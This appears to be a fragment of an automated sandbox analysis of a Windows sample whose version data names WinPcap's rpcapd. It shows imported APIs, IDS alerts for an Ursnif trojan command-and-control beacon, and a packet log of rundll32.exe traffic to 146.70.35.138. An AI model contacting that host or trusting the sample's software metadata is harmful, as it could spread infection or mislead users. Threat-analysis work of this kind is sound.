KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA |
Secur32.dll | InitializeSecurityContextW |
ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner |
GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW |
Description | Data |
---|---|
LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino. |
InternalName | rpcapd |
FileVersion | 4.0.0.1040 |
CompanyName | CACE Technologies |
LegalTrademarks | |
ProductName | WinPcap |
ProductVersion | 4.0.0.1040 |
FileDescription | Remote Packet Capture Daemon |
Build Description | |
OriginalFilename | rpcapd.exe |
Translation | 0x0000 0x04b0 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/23/22-08:12:19.910177 04/23/22-08:12:19.910177 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
04/23/22-08:12:21.823792 04/23/22-08:12:21.823792 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
04/23/22-08:11:59.593120 04/23/22-08:11:59.593120 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.42.16 |
04/23/22-08:12:20.776897 04/23/22-08:12:20.776897 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 23, 2022 08:12:19.885525942 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:19.909297943 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:19.909377098 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:19.910176992 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:19.933670998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288152933 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288214922 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288245916 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288285017 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288319111 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288326025 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288357973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288367033 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288398027 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288400888 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288439989 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288469076 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288495064 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288507938 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288549900 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288579941 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288608074 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.288620949 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288661957 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.288741112 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.328840971 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328908920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328913927 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328938007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328944921 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.328954935 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328972101 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.328991890 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.328993082 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329011917 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329025984 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329035044 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329041004 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329042912 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329065084 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329070091 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329091072 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329108000 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329138994 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329176903 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329232931 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329248905 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329309940 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329349995 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329365969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329461098 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.329534054 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329545975 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.329549074 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369694948 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369724989 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369743109 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369766951 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369785070 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369803905 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369812965 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369837999 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369841099 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369853973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369879007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.369882107 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.369931936 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.370174885 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.370202065 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.370218039 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.370239973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.370259047 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.370285988 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.393351078 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.396121025 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410522938 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410547972 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410562038 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410579920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410598040 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410609007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410725117 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410767078 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410773993 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410815001 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410842896 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410861969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410912037 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.410948038 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410972118 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.410988092 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411020041 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.411101103 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411129951 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411148071 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411159039 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.411170959 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.411206007 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:20.411315918 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:20.412249088 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49766 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 23, 2022 08:12:19.910176992 CEST | 1224 | OUT | |
Apr 23, 2022 08:12:20.288152933 CEST | 1238 | IN |